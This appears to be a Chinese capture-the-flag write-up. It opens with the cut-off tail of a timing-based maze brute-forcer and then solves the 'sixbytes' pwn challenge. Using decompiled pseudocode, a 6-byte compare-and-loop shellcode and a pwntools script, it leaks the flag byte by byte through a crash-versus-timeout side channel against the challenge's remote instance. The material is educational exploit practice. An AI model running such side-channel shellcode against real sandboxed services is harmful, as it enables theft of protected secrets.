opposite = {'w': 's', 's': 'w', 'a': 'd', 'd': 'a', 'u': 'n', 'n': 'u'}

while True:
    threads = []
    print(f'[+]Now: {"".join(flag)}')
    # Pruning: never repeat the previous move and never immediately reverse it.
    char_table = 'wasdun'.replace(flag[-1], '').replace(opposite[flag[-1]], '')
    for a in char_table:
        char_table2 = char_table.replace(a, '').replace(opposite[a], '')
        for c in char_table2:
            # Probe two moves ahead of the confirmed path.
            input_content = ''.join(flag + [a, c])
            t = threading.Thread(target=run, args=(input_content, a+c))
            threads.append(t)
            t.start()
    check_thread_exit(threads)

    if 'put)' not in stdouts.values():
        # No run printed the success message yet: keep only the first move of
        # the pair that ran longest, then probe again from there.
        most_likely = max(times, key=times.get)
        flag.append(most_likely[0])
        stdouts.clear()
        times.clear()
    else:
        # One of the probed pairs finished the maze; it is shown in `stdouts`.
        print('\n[+]Solution found:')
        print(''.join(flag), end='\nRest in :')
        print(stdouts)
        break

[2024 DASCTF金秋十月] sixbytes

这题的逻辑很简单:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
// Decompiler pseudocode: opens the file "flag" with flags 0, reads up to
// 0x100 bytes into the global buffer aDasctfTestflag, closes the descriptor
// and returns the buffer. Return values of open/read are not checked.
char *readflag()
{
int fd; // [rsp+4h] [rbp-Ch]

fd = open("flag", 0);
read(fd, aDasctfTestflag, 0x100uLL);
close(fd);
return aDasctfTestflag;
}
// Decompiler pseudocode: maps one 0x1000-byte page at the requested address
// 0x20240000 and reads exactly 6 bytes from fd 0 (stdin) into it, returning
// the mapping. On Linux, prot 7 is read|write|exec and flags 34 (0x22) is
// MAP_PRIVATE|MAP_ANONYMOUS; the mmap result is not checked.
void *readshellcode()
{
void *buf; // [rsp+0h] [rbp-10h]

buf = mmap((void *)0x20240000, 0x1000uLL, 7, 34, 0xFFFFFFFF, 0LL);
read(0, buf, 6uLL);
return buf;
}
// Decompiler pseudocode: creates a seccomp filter context with default action
// 0, adds no rules, and loads it; the surrounding article describes this as
// the default rule that forbids every system call. Exits with status 1 if
// either libseccomp call fails.
// The __readfsqword(0x28) pair is the compiler's stack-protector check, so
// the returned value carries no meaning for callers.
unsigned __int64 setrule()
{
__int64 v1; // [rsp+0h] [rbp-10h]
unsigned __int64 v2; // [rsp+8h] [rbp-8h]

v2 = __readfsqword(0x28u);
v1 = seccomp_init(0LL);
if ( !v1 )
{
perror("seccomp_init");
exit(1);
}
if ( (int)seccomp_load(v1) < 0 )
{
perror("seccomp_load");
seccomp_release(v1);
exit(1);
}
seccomp_release(v1);
return v2 - __readfsqword(0x28u);
}
// Decompiler pseudocode of the challenge entry point.
// Order of operations: sub_564B45B0534A() (opaque setup), alarm(10), load the
// flag, read the 6-byte shellcode, alarm(5), install the seccomp filter, then
// call the shellcode with the flag buffer as first argument and 0 as second,
// and finally exit(0).
// NOTE(review): the extra 10LL argument to readshellcode() does not match its
// definition; presumably a decompiler artifact.
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
{
void (__fastcall *v3)(char *, _QWORD); // [rsp-10h] [rbp-20h]
char *v4; // [rsp-8h] [rbp-18h]

sub_564B45B0534A();
alarm(0xAu);
v4 = readflag();
v3 = (void (__fastcall *)(char *, _QWORD))readshellcode(10LL);
alarm(5u);
setrule();
// The flag pointer is passed as the first argument, which is why the
// shellcode in the article addresses it through rdi.
v3(v4, 0LL);
exit(0);
}

使用了seccomp的默认规则 即禁用所有系统调用 这意味着基本上不可能输出读取到的flag

经过调试可以发现调用用户输入的shellcode时RDI中存放读到的flag地址 那么就可以利用这样的思路来爆破得到flag: 构造 cmp byte ptr [rdi + index], chr 来对比真正flag对应位上和猜测的字符

除此之外还要选择用来爆破的信道 这里选用程序是否已经超出输出流尾部(EOFError) 因为当程序执行到6 bytes后面的\x00时会因为Bad Instruction而退出 此时再接收数据就会触发EOFError 综上可以构造以下shellcode:

1
2
3
loop:
cmp byte ptr [rdi + index], chr;
jne loop;

让pwntools在timeout的时间范围内接收数据 如果猜测值是正确的程序会继续执行\x00并在接收数据时抛出EOFError 否则会正常接收到b''不报错 利用这点构造以下EXP:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from pwn import *
from keystone import *

context.log_level = 'error'
ks = Ks(KS_ARCH_X86, KS_MODE_64)


def Test_charAt_Index(ip, port, index, c):
    """Probe whether the flag byte at `index` equals the character code `c`.

    Sends a 6-byte loop that spins while the byte differs from `c`. If the
    guess is right the loop falls through, the remote process dies and the
    receive raises EOFError; if it is wrong the process keeps spinning and
    the receive simply times out.

    ip, port: address of the remote challenge instance.
    index:    offset of the flag byte to test, relative to rdi.
    c:        integer character code to compare against.

    Returns True when EOFError was raised (guess correct), False otherwise.
    """
    code = f"loop:;cmp byte ptr [rdi + {hex(index)}], {hex(c)};jne loop;"
    asmcode, _ = ks.asm(code)
    io = remote(ip, port)
    try:
        io.sendline(bytes(asmcode))
        io.recv(timeout=1)
    except EOFError:
        return True
    finally:
        # One connection is opened per probe; close it so sockets do not pile
        # up over the hundreds of probes a full run needs.
        io.close()
    return False

flag = "DASCTF{"
# Narrower candidate set for flags known to be hex/UUID-like; substitute it
# for `candidates` below to cut down the number of probes.
table = [ord(x) for x in "0123456789abcdef-{}"]
candidates = range(ord(' '), ord('}') + 1)

# Recover one character per pass until the closing brace is found.
while flag[-1] != "}":
    for i in candidates:
        # xxxxx is a placeholder: replace it with the port of the remote instance.
        if Test_charAt_Index("node5.buuoj.cn", xxxxx, len(flag), i):
            flag += chr(i)
            print(flag)
            break
    else:
        # Nothing matched in this pass (e.g. the timeout was too short), so
        # the same position is tried again; say so instead of looping silently.
        print(f'[!] no candidate matched at index {len(flag)}; retrying')

与逆向中本地爆破的侧信道不同 靶机同时只能运行一个目标程序 所以不进行多线程爆破 这样就需要根据输出的flag特征适当进行table范围的缩小或更改timeout